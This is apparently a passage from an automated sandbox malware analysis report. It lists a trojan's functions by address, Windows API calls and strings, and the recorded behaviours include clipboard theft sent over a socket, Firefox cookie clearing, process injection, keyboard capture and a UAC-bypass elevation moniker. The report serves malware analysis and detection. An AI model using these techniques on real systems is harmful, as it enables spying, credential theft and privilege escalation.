                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 3520204547-604454484
                                                                                                                                                                                                  • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                                                                                                                                  Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                                                                                  • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                                                                                                                                  Function 0041330D Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 297527592-0
                                                                                                                                                                                                  • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                                                                                                                                                                  Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                                                  • API String ID: 3756808967-1743721670
                                                                                                                                                                                                  • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                                                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                                                                                                                                  Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                                                  • API String ID: 0-1861860590
                                                                                                                                                                                                  • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                                                                                                                                  Function 00452690 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                  • String ID: JD$JD$JD$t'`/
                                                                                                                                                                                                  • API String ID: 745075371-903519349
                                                                                                                                                                                                  • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                                                  • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                                                                                                                                  Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object_wcslen
                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                                                                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                                                                                                                                  Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                                                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3587775597-0
                                                                                                                                                                                                  • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                                                                                                                                  Function 00449210 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 00449292
                                                                                                                                                                                                  • _free.LIBCMT ref: 004492B6
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                                                  • _free.LIBCMT ref: 00449609
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 314583886-2084328917
                                                                                                                                                                                                  • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                                                  • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                                                                                  Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                  • API String ID: 1164774033-405221262
                                                                                                                                                                                                  • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                                                                  Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                                                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                                                                  Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                                                                  • API String ID: 341183262-3812160132
                                                                                                                                                                                                  • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                                                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                                                  Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1888522110-0
                                                                                                                                                                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                                                                                  Function 004541D9 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$t'`/
                                                                                                                                                                                                  • API String ID: 4168288129-2107481299
                                                                                                                                                                                                  • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                                                                                  • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
